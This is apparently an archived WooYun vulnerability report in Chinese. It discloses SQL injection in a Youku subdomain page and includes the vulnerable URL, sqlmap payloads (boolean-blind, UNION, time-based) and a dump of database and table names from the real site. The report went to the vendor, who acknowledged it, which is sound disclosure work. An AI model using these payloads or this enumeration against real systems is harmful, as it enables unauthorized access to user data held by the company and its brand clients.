优酷分站SQL注入

编号83661
Urlhttp://www.wooyun.org/bug.php?action=view&id=83661
漏洞状态厂商已经确认
漏洞标题优酷分站SQL注入
漏洞类型SQL注射漏洞
厂商优酷
白帽子U神
提交日期2014-11-17 22:29:00
公开日期2015-01-01 22:30:00
修复时间(not set)
确认时间2014-11-18 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank10
漏洞简介
None
漏洞细节

http://hvsop.youku.com/list.php?music=1


09.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: music
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW
Type: UNION query
Title: MySQL UNION query (NULL) - 15 columns
Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,C
ONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL
,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[22:00:42] [INFO] fetching database names
available databases [3]:
[*] db_events
[*] information_schema
[*] test
[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\hvsop.youku.com'

POC

Database: db_events
[250 tables]
+--------------------------+
| 7up_user |
| adidas_2010_football |
| adidas_2011_tvc_info |
| adidas_comments |
| aveo_clicks |
| aveo_comments |
| aveo_users |
| background_users |
| bosideng_1024_users |
| bosideng_code |
| bosideng_fake_users |
| bosideng_photos |
| bosideng_users |
| bosideng_video_vote_logs |
| bosideng_videos |
| bosideng_vote_logs |
| bsd_kpi_email |
| bsd_kpi_user |
| bsd_rt_log |
| bsd_user |
| bugles_videos |
| casesharing_2013 |
| cgirl2014_awards |
| cgirl_images |
| cgirl_users |
| cgirl_videos |
| chengxin_news |
| chery_comments |
| chery_photo_vote_logs |
| chery_photos |
| chery_users |
| chery_video_vote_logs |
| chery_videos |
| cityshow_comment |
| cityshow_data |
| cityshow_member |
| clear_game_log |
| clear_log |
| clear_rt_log |
| clear_users |
| crowneplaza_register |
| cruze_images |
| cruze_users |
| cruze_videos |
| deyi_tickets_users |
| dove2014_erweima |
| dove2014_videos |
| dove_user |
| dove_video |
| dumex_videos |
| etam_comment |
| etam_txt |
| fiesta_2011_guestbook |
| fm_dream |
| fm_kpi_member |
| fm_number |
| fm_number_bak |
| fm_number_t |
| fm_number_test |
| fm_support_log |
| fm_user |
| fm_vote_log |
| fm_work |
| ford_users |
| global_accounts |
| global_china |
| global_files |
| global_minisites |
| global_testing |
| global_units |
| greetingcard_params |
| gucci_comments |
| gucci_rt_logs |
| gucci_users |
| hkdl_users |
| ht_config |
| ht_guest |
| ht_user |
| htc_config |
| hvsop2013_awards |
| hvsop2014_20 |
| hvsop2014_users |
| hvsop_comments |
| hvsop_live_email |
| hvsop_resumes |
| hvsop_users |
| hvsop_videos |
| hvsop_vote_logs |
| icedew_videos |
| jasmine_comments |
| jw2ask_marked |
| jw2ask_plans |
| jw2ask_questions |
| jw2ask_same_q |
| jw2ask_top30_grade_logs |
| kohler_comments |
| kohler_mm_awards |
| kohler_photo_vote_logs |
| kohler_photos |
| kohler_prize_logs |
| kohler_users |
| kohler_video_vote_logs |
| kohler_videos |
| lancome_datas |
| lancome_infos |
| lancome_users |
| lee_moment_photos |
| lee_moment_votelog |
| levis_data |
| levis_logs |
| levis_win |
| loreal_flash_ad |
| mabelline_users |
| mamonde_2013_videos |
| market_huanzhu_votes |
| marketing_apply_info |
| marketing_darenxiu |
| marketing_fashion |
| marketing_jianjiancao |
| marketing_kfc_avatar |
| marketing_kfc_cms |
| marketing_laifushi |
| marketing_upload_info |
| mmd_datas |
| mql_award |
| mql_seckill |
| mql_seckill_bak |
| mql_seckill_log |
| nfsq_users |
| nikegz_comments |
| nikegz_image |
| nikegz_pks |
| nikegz_videos |
| nivea_answer_logs |
| nivea_awards |
| nivea_final_awards |
| nivea_photos |
| nivea_question |
| nivea_users |
| nivea_vote_logs |
| onstar_regist |
| onstar_video |
| oreo_images |
| oreo_videos |
| pepsi_comments |
| pepsi_ecards |
| pepsi_media |
| pepsi_users |
| pepsi_videos |
| pepsi_vote_logs |
| pepsicny_videos |
| qingyang_comment |
| qingyang_videos |
| remyvsop_banner |
| remyvsop_comment |
| remyvsop_mobile |
| remyvsop_news |
| remyvsop_register |
| remyvsop_teams |
| remyvsop_videos |
| ricola_pincode |
| ricola_tickets |
| roewe_comment |
| roewe_config |
| roewe_guess |
| roewe_player |
| roewe_user |
| scj_users |
| sprite_users |
| sprite_videos |
| superb_comments |
| superb_comments_bak |
| superb_videos |
| sww_2011_users |
| sww_2011_videos |
| unit_cachedata |
| unit_comments |
| unit_misc |
| unit_news |
| unit_users |
| unit_videos |
| unit_visitors |
| unit_voting |
| vichy2013_awards |
| vichy2013_winners |
| vsop_email |
| vsop_live_mobile |
| vsop_loop_videos |
| vsop_lyp |
| vsop_users |
| vsop_videos |
| vsop_vote_email |
| wtcc_2011_guestbook |
| wtcc_2011_shots |
| wtcc_2011_users |
| wzmt_awards |
| wzmt_awards_bak |
| wzmt_seckill |
| wzmt_seckill_log |
| z_acer_user |
| z_bwnzb_user |
| z_eleven_user |
| z_fanta |
| z_fanta_email |
| z_ferrari |
| z_ferrero_user |
| z_huggies |
| z_huggies_comments |
| z_k3 |
| z_k3_user |
| z_k3_v |
| z_lenscrafter_pic |
| z_lenscrafter_user |
| z_loreal |
| z_market_disney |
| z_market_topchef |
| z_proya2011_100 |
| z_proya2011_code |
| z_proya2011_mblog |
| z_proya2011_pic |
| z_proya2011_user |
| z_proya2011_v2_pic |
| z_proya2011_v2_user |
| z_proya_pic |
| z_proya_user |
| z_remyclub_comment |
| z_remyclub_user |
| z_riich_user |
| z_sdeer_user |
| z_sepb_user |
| z_sgm15th |
| z_volvo |
| z_wp_code |
| z_young |
| z_z_comment |
| z_z_contact |
| z_z_contact2 |
| z_z_email |
| z_z_img |
| z_z_luck |
| z_z_module_luck |
| z_z_p |
| z_z_txt |
| z_z_txt_vote |
| z_z_v |
| z_z_vote |
| z_z_vote_id |
| z_z_vote_ip |
| zhijue_users |
| zqbb_videos |
+--------------------------+

修复方案

我就跑到表,不深入了,修复吧,谢谢~好几天没rank了能来点不?

状态信息 2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2015-01-01: 细节向公众公开
厂商回复多谢提醒,马上修复。
回应信息危害等级:中漏洞Rank:10 确认时间:2014-11-18 08:46
Showing 1-3 of 3 items.
评论内容评论人点赞数评论时间

你关注的白帽子 U神 发表了漏洞 宜信某重要分站命令执行(可内网渗透) 2014-11-18你关注的白帽子 U神 发表了漏洞 优酷分站SQL注入 2014-11-17你关注的白帽子 U神 发表了漏洞 东方航空分站命令执行 2014-11-17

Aepl│恋爱02014-11-19 09:56:00

此号被社 by:U神

backtrack丶yao02014-11-18 08:52:00

前排~~~

ki11y0u02014-11-18 02:05:00